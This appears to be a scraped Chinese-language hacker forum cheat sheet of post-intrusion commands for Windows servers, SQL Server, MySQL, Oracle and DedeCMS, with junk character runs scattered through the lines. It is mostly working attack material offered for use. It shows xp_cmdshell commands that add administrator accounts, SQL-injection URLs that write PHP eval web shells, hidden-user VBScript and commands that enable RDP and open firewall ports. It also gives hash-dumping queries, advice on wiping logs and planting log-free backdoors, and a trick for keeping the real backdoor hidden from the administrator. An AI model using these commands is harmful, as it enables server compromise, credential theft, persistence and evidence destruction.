" I. O9 ~" f! }( P1.net user administrator /passwordreq:no; R/ E8 B& p" Q0 C4 I
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
3 s1 e4 \. @( g/ B2.比较巧妙的建克隆号的步骤
- s: v2 t! b& a6 T& T* L9 p先建一个user的用户. ]1 s% V( |$ y: N0 A/ ]& l& [
然后导出注册表。然后在计算机管理里删掉
; E' K2 s3 g b1 Q在导入,在添加为管理员组' g. r# L1 [) L. V" A7 m+ {' F
3.查radmin密码
" ]8 v n/ z$ Y ~5 @3 J1 t- xreg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg: G# j- s8 {, c/ H4 T9 l, i T9 G
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
8 h2 q# s4 K% @! _3 N8 R建立一个"services.exe"的项
) K4 c7 b, W0 v. e" J再在其下面建立(字符串值)
& J1 m/ g8 L* x) o( T) |键值为mu ma的全路径5 p6 m) }9 J+ y, ]! C. l
5.runas /user:guest cmd
6 f! m5 V0 Q* }测试用户权限!) R, g) y% e! T
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?
+ e( n, @3 C! f7 u# W% g7.入侵后漏洞修补、痕迹清理,后门置放:4 L9 ^3 J: O5 |5 `
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
/ {+ J1 I) ?1 ?* w1 t, J4 B8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c% h/ V& r% a! ?7 ~( F' E4 ?, p P
& g$ Z5 P$ C; X/ ?4 W8 q( }for example9 h! Z3 {% K8 b! q9 D8 {6 R
' g9 s* q8 J. D0 p+ K. U$ ]# l
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'& \% o n5 J! X4 |% v
8 p; h0 i9 w# D) V9 d% B
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'3 j4 o1 U# S& [- U9 l
! `7 ~! r6 w% a) R
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了7 O$ ?: U" N/ P1 Y& m
如果要启用的话就必须把他加到高级用户模式( n; n1 V9 W5 S: B6 z
可以直接在注入点那里直接注入
* t5 R4 D3 S8 Eid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
; w+ n" C5 [) G0 l/ ?! m然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
0 h( o: h. X6 g2 [- V" E7 {6 b4 h或者
: _' e) j: F; T$ |! v$ Ksp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
$ V9 u. [0 M9 U5 ]来恢复cmdshell。3 f( g7 [2 `) [2 [* K
~2 k. W: {* w
分析器9 `; N8 W: ~/ _
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
6 j I. T- r* e1 m" v# i2 l2 ]然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
3 a5 N% E9 p% O. [9 s3 r9 [8 ?10.xp_cmdshell新的恢复办法- {. O. x: `' ]' ~) [: o
xp_cmdshell新的恢复办法, x% }# `. P8 H; }3 f0 u3 {5 [
扩展储存过程被删除以后可以有很简单的办法恢复:2 p; Q3 _: ]% N. f5 B5 E
删除
2 P3 {. u& `- ~: c# wdrop procedure sp_addextendedproc' o- a; J6 }$ ?' D
drop procedure sp_oacreate
1 A9 S3 P. B& b( Y( c9 W( a7 M8 Uexec sp_dropextendedproc 'xp_cmdshell'8 _- P8 G+ b- {, V
. w4 n1 d0 n: `6 Q0 M P6 }8 \& a
恢复
9 U! P, J, J5 a& D3 ?2 H- ^dbcc addextendedproc ("sp_oacreate","odsole70.dll")
6 K" l6 m9 I; Udbcc addextendedproc ("xp_cmdshell","xplog70.dll")
9 A9 j X X. |$ v
3 j+ P5 `7 K( m. N5 C& l这样可以直接恢复,不用去管sp_addextendedproc是不是存在
; y) Z( G9 }$ ^) b% @6 u8 u+ {( U& u, P% T# J
-----------------------------5 z u$ F9 P2 E& ?! L" t+ o
$ _; D0 O7 J L! P! ~& W. Q
删除扩展存储过过程xp_cmdshell的语句:
- l. v Y# r; {. I1 n5 b% xexec sp_dropextendedproc 'xp_cmdshell', t: u9 B7 w. q( T o6 f
r, W# C8 A8 e- {5 }2 H恢复cmdshell的sql语句
! |: S H; B2 V$ dexec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'2 G" S( G" H0 j) E1 w: D
o0 y& }( r5 B* f, V' ]& t2 x+ q
! I5 a4 J& b" r$ y; F: z6 ^开启cmdshell的sql语句5 F, |& m' [! ?8 n3 J' Y- w
/ Q6 A* H+ o# i* [exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
3 w. w) ^) i$ J/ ?( A1 E# N5 @2 V, a+ E/ x
判断存储扩展是否存在6 p5 j% n: l* q! s, y, X, \
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
1 X( l/ Z. E: W* K+ |返回结果为1就ok0 |/ Q* Y; x1 X* N* g; l
2 f N; ?+ [; x& k% o: w! y0 |
恢复xp_cmdshell0 ~$ ?3 X8 M% x
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'! z5 i Q f% A- I+ Q! K3 P1 \
返回结果为1就ok/ C( s! k {! \( t5 ~
1 B' f: R; y. f
否则上传xplog7.0.dll
8 Q; J) y' Y' e1 Yexec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll', O5 P# A0 e; g
% ]$ v6 G$ A3 h2 X
堵上cmdshell的sql语句" d% U& }: m! q: c7 ]# @( e
sp_dropextendedproc "xp_cmdshel/ O" Z! A5 w$ ? ^
-------------------------
4 J8 y; B# n7 ^& g清除3389的登录记录用一条系统自带的命令:
1 z* b$ Z, E6 {1 Xreg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
" t, X" C. ~2 D5 c: }* a1 Q0 Y; C7 n" R g, b4 [
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件$ S& B6 v& {/ O; W3 c
在 mysql里查看当前用户的权限
# Z& j6 H9 T: rshow grants for * K1 `) k: S0 Q4 g. L
$ e2 k/ X3 L+ B
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
) ^4 p% X" ?( F+ f3 ?( |3 a$ D
1 M9 Q$ A: k2 n/ @4 W; n+ T
* ]3 L V( n3 b8 LCreate USER 'itpro'@'%' IDENTIFIED BY '123';
3 L0 g [ ^3 A' ^. D! M' {0 X R9 s2 ^- e8 P8 O. g/ b
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
' J2 {$ W1 j% \8 [, d1 _0 r" ^% q1 r5 w+ N0 I
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
`- n* H5 v9 Z) J# g. ]# \9 L2 x8 P: v
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
3 H$ {) k2 h9 e6 S( B9 m
2 _+ [3 z* v1 Y7 `1 D+ E2 {$ a& h搞完事记得删除脚印哟。
+ X: R+ H: ?5 q K7 s/ P
( \6 T6 n( } L" m2 eDrop USER 'itpro'@'%';
, i/ R5 g* N) o; l/ w
# ]& k ^4 R. G+ EDrop DATABASE IF EXISTS `itpro` ;3 g6 ?1 a2 I E/ `5 B8 i3 d
- Q& o8 `+ v8 g' a! z( Q当前用户获取system权限) G7 Q% I" I$ X$ ?- C# a8 Q8 m$ a
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact" Z2 m1 E0 K# G# F @0 I w
sc start SuperCMD
6 T% Y7 d! U6 Y程序代码
: m$ i. g5 R5 l2 l! z! s: @. d<SCRIPT LANGUAGE="VBScript">
- }- H; y; E) j4 }set wsnetwork=CreateObject("WSCRIPT.NETWORK"); I& W2 T5 |1 Q0 k6 Y
os="WinNT://"&wsnetwork.ComputerName
. w% h* D) D$ V1 cSet ob=GetObject(os)9 Y k: b- ^; f& S$ a
Set oe=GetObject(os&"/Administrators,group")
9 {% F9 Y1 x; @- k* G/ n3 pSet od=ob.Create("user","nosec")5 a0 K& {, _: _# h& }
od.SetPassword "123456abc!@#"
+ |' _6 g; \3 {od.SetInfo
1 ^4 H& o& B6 H6 ^. o$ ^" eSet of=GetObject(os&"/nosec",user)" o: V9 d% s5 [) o L( R& v! Z0 z
oe.add os&"/nosec"
9 a6 r8 q; R" e: w9 ], @: C</Script>$ P9 z1 t: ^; z$ j4 G( [
<script language=javascript>window.close();</script>
^; L( o. w1 {
4 {) l5 s& n! U( n+ G% j
4 G; |! t- U. j' U$ @+ Z2 o; f4 _
( ~ F. n. A6 x E) G0 q
# ~! @) @ z8 P/ A% U6 T/ g& c突破验证码限制入后台拿shell h+ M2 c: H8 I& o" F$ p
程序代码4 t ~: U: d8 Q3 b* ^" Y
REGEDIT4
7 P) D4 T4 @1 X) h9 Z' q[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] ' g v5 n! d/ L: v$ q! Z
"BlockXBM"=dword:00000000
: W( u- p6 o e) A- W
3 [' G! F+ S, c3 V1 N保存为code.reg,导入注册表,重器IE
2 a$ Q$ z2 X$ W6 F" l5 m5 y就可以了1 P V4 K1 |/ E& }& k' V2 H
union写马& L6 {" @9 U6 O% E6 @$ q* f# ~% w
程序代码! Z$ o" d; w! ` |. p' S
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*3 p7 S& ?9 `8 H) D6 r2 z
: F- h' w" Z. I6 X+ u7 R3 q2 R: o
应用在dedecms注射漏洞上,无后台写马( a' P: R% |" N: h3 b/ m* `
dedecms后台,无文件管理器,没有outfile权限的时候! Y; `! y/ ?7 P+ B) M6 X% w
在插件管理-病毒扫描里! ~! }% [3 t1 a
写一句话进include/config_hand.php里
$ N2 q& h4 C" ~; }8 H+ y程序代码
4 \( ~6 y) M% n4 ]7 f>';?><?php @eval($_POST[cmd]);?>
; |: b4 e* h7 H2 c/ h# h7 v; n; i7 e7 e7 _# N$ q4 m- ~& r p/ G) M
9 \9 A0 }7 ^7 C如上格式* c3 a7 | @* Z) A0 s5 F' h5 y
& g4 H9 O; b' p! Y6 L6 F4 @0 q1 h
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
( d, u5 D& [% |' G" l5 x8 g% k程序代码
2 {; N& j% g. ^select username,password from dba_users;% z1 V5 Q( j- Y
+ I7 L0 S& {, J
$ p( B4 x* D, \+ C* E6 H# \# l
mysql远程连接用户
4 c4 X2 c8 D' P5 A3 X6 h程序代码. C* ]) b. ?6 w* h, C) f% Z- s
1 K( C7 u) k9 K# p* {8 Q
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';$ `0 {' N% @. t: F
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION" Z F6 w+ ]9 u. U9 e4 o
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 00 d1 O7 I, W" n- E4 z
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;% p# z) ~+ Y7 }( M
) y* D/ n+ P8 W5 s* a9 c7 Y, N) E( c# H8 g
9 Y. \$ h$ G) T% h' \* i
6 i' D( o1 g+ G! F3 l8 x: aecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
; T" y+ u' j3 p0 u+ k1 P7 v+ l- D$ {5 ^7 m( |
1.查询终端端口
0 o6 L1 G z1 T) T4 e1 R) U1 w4 n2 V) y* f7 p' g
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber* Z+ U" d$ a$ `9 C3 a0 y
1 [- Y: H& e. G) J! s: G! M1 B
通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
; q; C9 g! @* K& h7 B! d" f+ btype tsp.reg
9 v3 }* U/ H7 f! |# }( c- ?* W3 n7 p
2.开启XP&2003终端服务
' V1 e' `% `9 Y i( Q7 k2 @ R. U
. ?$ S7 [! E8 |" K. s
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
3 B# y p0 q/ M2 B$ q0 A0 [8 o) I1 \% Y) U+ x9 i( W
6 e$ B' ]% W; @
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f' h% _3 H: P4 ~# i- p. {
/ N3 U% w. q/ t0 ^3 K
3.更改终端端口为20008(0x4E28)9 f4 I) S1 d) L" s$ L
. d4 P$ b+ C; i/ S- h. K ~7 NREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
8 B% s# n0 H U; F2 F0 q
3 r/ S t" w* v% z$ E( C2 _REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
/ ]* \! e/ o5 F* ~9 P' Y5 u$ a1 u; e6 |3 w; K, M' a
4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制; J; H+ {+ k, g6 [7 `
9 }: I8 O- ]' I1 @
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f3 b q1 \5 E: ^5 X& ]; D/ H7 F
: H: o$ [: p4 Z. u. i1 G, V
5 |4 M# I: p. Q5 [$ P f5.开启Win2000的终端,端口为3389(需重启)
4 c, ~, q. V7 ]: i& j( S$ O' j9 [4 w
" n7 o1 E* G$ E" ^/ D% Hecho Windows Registry Editor Version 5.00 >2000.reg 7 \$ v$ ^# C8 s9 {/ J% j/ o H4 D; ~# \
echo. >>2000.reg# z+ J i) J: t1 ~' |
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg , A5 u) P6 F* Y' H+ T# {
echo "Enabled"="0" >>2000.reg + B; U' g* k6 S
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg 6 J( } b& o( l+ g
echo "ShutdownWithoutLogon"="0" >>2000.reg 4 J) x. t! |5 m4 v, ~( U; ~
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
# X' d, {' W; p, _2 kecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
- G, v) l/ e& V9 l1 F& z/ m& yecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg + r' {: p, t6 b/ X4 y: s5 A5 M
echo "TSEnabled"=dword:00000001 >>2000.reg
- l0 R' U* M; y; e$ T7 L4 R$ ^echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
: v4 [/ ]! ]3 B4 p6 ^5 h$ _echo "Start"=dword:00000002 >>2000.reg
/ l/ Y5 ^7 ^# |* V- d# b. m4 ^echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
0 O+ g* J% `5 Q0 P- `3 Wecho "Start"=dword:00000002 >>2000.reg
0 _6 F- G% ?) w+ becho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg ; b. b# ]0 K# H2 y) ]
echo "Hotkey"="1" >>2000.reg . m& z% f& ^' Y: C: m
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg ( i& |. U# h3 l% U0 F: s0 Q9 h
echo "ortNumber"=dword:00000D3D >>2000.reg 2 {1 ^2 x( s# F/ T S1 ~
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
9 [; E8 z l/ B2 d$ |echo "ortNumber"=dword:00000D3D >>2000.reg7 s% z' e- K8 k
* k6 y r1 ?) t4 r0 p6 \) x
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
6 e+ l2 T( `. l9 \3 f2 \" P2 u( }5 O5 q4 F4 N) u7 E( O" K8 B
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf& ?% [0 L9 | S2 K' G! A$ o; V
(set inf=InstallHinfSection DefaultInstall)
' e- G( \3 G0 I: k3 m" u Eecho signature=$chicago$ >> restart.inf
( i2 j* u6 C+ L- a2 ^: z8 Kecho [defaultinstall] >> restart.inf
$ h7 W2 F" q( E. ~0 Irundll32 setupapi,%inf% 1 %temp%\restart.inf
7 Z- v# c9 K$ r- x4 y! T2 V% q& _/ U- t
$ Q. s" ^4 @5 g7.禁用TCP/IP端口筛选 (需重启)1 U s6 T" P# z
c# V' A3 ~7 w6 E
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
. v% W! E! d3 B; I4 g; k- ]4 e3 V$ ~5 ?( a5 X# b
8.终端超出最大连接数时可用下面的命令来连接
) s! t, I/ o1 \6 w
( h9 F+ h1 a4 V1 T4 e6 `* Wmstsc /v:ip:3389 /console ?' H& _. {9 I: o& |
; |# M, g: R( u
9.调整NTFS分区权限/ G e4 s; U1 m7 e
# N7 d+ n% T3 p7 u! u
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)- j) i# U- R& W( M+ E- _3 c
* \7 }) c8 _+ G5 P9 T
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件). V" _9 H7 g' V2 B2 X4 Y+ p. T
# D5 k8 \* U0 n
------------------------------------------------------
9 a4 y: I0 E3 j+ I" W$ X- F, k3389.vbs
- r, h8 [+ r- L" ~2 B0 a! L: i+ jOn Error Resume Next, `' R- O% H8 g- ~8 Q0 b4 O) X' {
const HKEY_LOCAL_MACHINE = &H80000002: _" ~/ `" M O7 o/ E* u
strComputer = "."
' O- Z% g1 Z3 }Set StdOut = WScript.StdOut
# J; S6 F. Y: P3 L$ i) eSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_$ E# @ b1 z. U7 y! W
strComputer & "\root\default:StdRegProv")
& \# h: N' b9 r" f* gstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"7 D) x3 V# T* T9 V' B3 `3 V" g7 H
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
1 @0 J0 {" f% t/ V8 \- tstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"7 V: Q9 T: h$ i4 `" K
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
( W- m9 S& @: A2 r% ystrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"3 ?; O- r4 ^& \7 \( {( I
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
4 ~3 Y# B: ^3 b5 ]3 h6 fstrValueName = "fDenyTSConnections"
9 y; h6 q6 \2 P V' P: K% L' JdwValue = 0' n2 z- G( T0 _# x! I8 w
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue( f" l9 S& M c' ~; O* \5 k" O
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
+ K$ L! \$ _, Y/ m6 estrValueName = "ortNumber"
5 H. @; S' B# U; M: m1 e1 f+ C5 KdwValue = 3389
9 O. N' ~- K, B; |7 ]oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue. M/ Q4 w' L4 i: s1 l7 |/ E
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"6 }+ Q% p. D% g" y
strValueName = "ortNumber"3 K- L; t6 c9 R5 ]9 C
dwValue = 33899 u7 G' h3 z$ y# L% q1 J
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
1 H+ n( s& }: T; w5 R& rSet R = CreateObject("WScript.Shell") 5 [& R, P# h( h: L, d' D8 j. K
R.run("Shutdown.exe -f -r -t 0")
2 o5 e$ d& j# l+ n/ |' H/ |7 Y7 ^, ?+ l! J# W" C$ _. v) J! ?/ Q
删除awgina.dll的注册表键值
$ D* \- y6 s0 n6 o程序代码
0 e* X$ k/ j3 @; O
; G7 \1 d2 L' R' G/ Mreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
6 O% P! I6 {8 j6 r; a8 q
* C, E6 x* z8 j8 w3 Y: G& Z V# C; `$ M- ?) F: x4 S
' }" P' I, ^2 Q P- c) m$ {6 W( ?3 U1 ^
程序代码9 F% A: P" y% T1 b2 g
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash8 j2 i7 ^& l+ S8 t$ G+ h
* ^6 B, e* [6 t' Q {: [( K
设置为1,关闭LM Hash
9 w/ c n& u8 f% p, Q7 ^9 _/ n
n3 Q, o, e) K8 G& `7 [数据库安全:入侵Oracle数据库常用操作命令
: I0 t. h6 r* `. W$ |最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。) D3 n4 y& q D1 K* c
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
( c3 Z: R3 a" }2 X; m2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
1 X; E9 w& a2 C) f6 h3、SQL>connect / as sysdba ;(as sysoper)或' j; L d: K1 x% Y7 W
connect internal/oracle AS SYSDBA ;(scott/tiger)
5 ^& s& N; G! A! {6 Mconn sys/change_on_install as sysdba;
/ o& x/ ]) ^1 `/ U: x) M4、SQL>startup; 启动数据库实例
. n. d* B1 C# P9 D5、查看当前的所有数据库: select * from v$database;
" v" l9 Z$ S/ ], K; [' @3 T, vselect name from v$database;
+ V- E1 }* ^; w' q/ x _6、desc v$databases; 查看数据库结构字段
4 C4 N9 _, ], N5 R0 }3 ^7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
: S0 n: M& x% F% M& MSQL>select * from V_$PWFILE_USERS;
" s$ y+ v9 t3 v7 B5 AShow user;查看当前数据库连接用户6 e6 I0 N# i" \0 D" Y/ w
8、进入test数据库:database test;0 R G0 O% Z& F# b
9、查看所有的数据库实例:select * from v$instance;$ _( x: N. c/ W% @- h3 L
如:ora9i: J; ?3 {3 @& U: Y( E5 E8 P- Z/ B
10、查看当前库的所有数据表:
% O0 k: a+ l6 Y' u- D( XSQL> select TABLE_NAME from all_tables;
P( F4 I6 @7 e3 B$ ]/ Aselect * from all_tables;
8 D( ~' q" a0 o9 a' tSQL> select table_name from all_tables where table_name like '%u%';; c7 j2 [. J) Z [4 k6 j$ e
TABLE_NAME
6 t) v# A& H$ F0 r------------------------------7 H' Z& f- I5 q6 v
_default_auditing_options_
+ h% _* k! s7 O11、查看表结构:desc all_tables; q& k7 R$ L [+ V5 S; H
12、显示CQI.T_BBS_XUSER的所有字段结构:/ V+ h$ q F5 w; {! z
desc CQI.T_BBS_XUSER;: g6 Q8 N# B/ V
13、获得CQI.T_BBS_XUSER表中的记录:
2 i, @+ ?/ ]" s+ f7 n' G! T+ Uselect * from CQI.T_BBS_XUSER;' n1 x6 \" T6 X$ m" Z5 n
14、增加数据库用户:(test11/test)' w" X+ W- j+ w2 f
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;8 A4 v% w* ~% W) d+ L. f" ]& ]9 B' Q
15、用户授权:3 b8 A1 @9 ?4 ]0 N$ E0 B9 B
grant connect,resource,dba to test11;$ l: G6 k6 @7 q4 j2 O
grant sysdba to test11;, K5 o. i, v& `" b, v
commit;+ r& W% n4 B, h$ C
16、更改数据库用户的密码:(将sys与system的密码改为test.)
6 M+ q9 i& S/ \* r6 o: Kalter user sys indentified by test;
5 g/ i- G/ c7 N$ Walter user system indentified by test;
2 h% x9 X3 ?0 n. K; v' D0 g/ S" s) Q% c1 ]8 b2 W) H0 B" d) q, V
applicationContext-util.xml9 ~) M/ I, m# y' g$ e
applicationContext.xml
% X, g0 {9 [0 N: Hstruts-config.xml' K. l: ~& u+ Q) H, u3 e% M( T7 b
web.xml! i5 a) o: \8 k( H u- ?2 Z6 x
server.xml
' M7 B. }) W8 x+ [6 {$ c) \; v5 U+ Ctomcat-users.xml. k7 T; F0 ]9 E$ V
hibernate.cfg.xml
) m5 j% I. j/ o7 |7 Ddatabase_pool_config.xml
& P8 f% Z# g3 O2 f q
$ A. D3 e3 O4 e5 z, r3 Y
6 y) \$ P& C4 q! S3 v3 _\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置- f( [1 f' t9 a) z9 u
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini
) p) f2 ~4 _/ M1 w3 M0 L2 @\WEB-INF\struts-config.xml 文件目录结构( K. O9 o8 _, Q
2 V+ q4 Z8 u2 d! x
spring.properties 里边包含hibernate.cfg.xml的名称& Q" K" g* |4 Z, ? e5 e
$ _; {/ k; W4 J! c7 d0 Y
7 P- D9 L) ^* E4 F/ L" GC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
2 ]" T, P# N0 R
4 g/ W; e! `; T9 `如果都找不到 那就看看class文件吧。。1 g( t1 ?9 c9 z7 K& o1 G3 W! n
+ I2 N5 U6 d4 _. F' P
测试1:- i% Y( ]/ N4 H( v( Y
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1. S& k; m* x% b7 d B& e8 M8 t! R$ r
1 j5 i6 N3 W: {& m
测试2:9 z& D1 B7 L# @0 e. v4 @
' k* [3 [+ m- y( O% k- T' Dcreate table dirs(paths varchar(100),paths1 varchar(100), id int), f3 \- j6 _- r5 e% c; P9 x1 w" Q2 k
) ~) x! b( x# k$ z _. `) j- l
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--! f' n: C5 C$ G6 Y& k% x8 g
7 _* V& D& B1 ^' b4 v5 o7 bSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1+ w( K' p5 U8 T' Q) b2 w
' \4 A/ l# A) ^/ R9 l# G查看虚拟机中的共享文件: R- ] R5 `2 }$ z
在虚拟机中的cmd中执行
7 V0 T4 Y# R: l% T/ F t\\.host\Shared Folders
* [; \# S* E3 N' I) b
3 i, _0 d S" E0 u8 @cmdshell下找终端的技巧
! k1 G4 U+ M3 Y+ b& n$ X找终端: # b+ ^: S# m }; i+ b$ p
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
% p; l( ~; u" D) a. o 而终端所对应的服务名为:TermService
0 G0 |" ?8 \6 E: Y* N第二步:用netstat -ano命令,列出所有端口对应的PID值! # c% ?( y* j, b* {8 `# ^4 o* k
找到PID值所对应的端口2 v. i8 C4 I( G
9 U% P$ u5 i( {3 Y
查询sql server 2005中的密码hash
& L/ R& e# Q* p. e2 N+ G. qSELECT password_hash FROM sys.sql_logins where name='sa'
9 |+ Q% J4 e' U6 \- o, @SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
4 k" Q) ]5 q' b# H! E1 Q" laccess中导出shell
- C# R2 a3 E8 k7 r2 E& w/ z0 R& Z, `3 }& b c% q. z
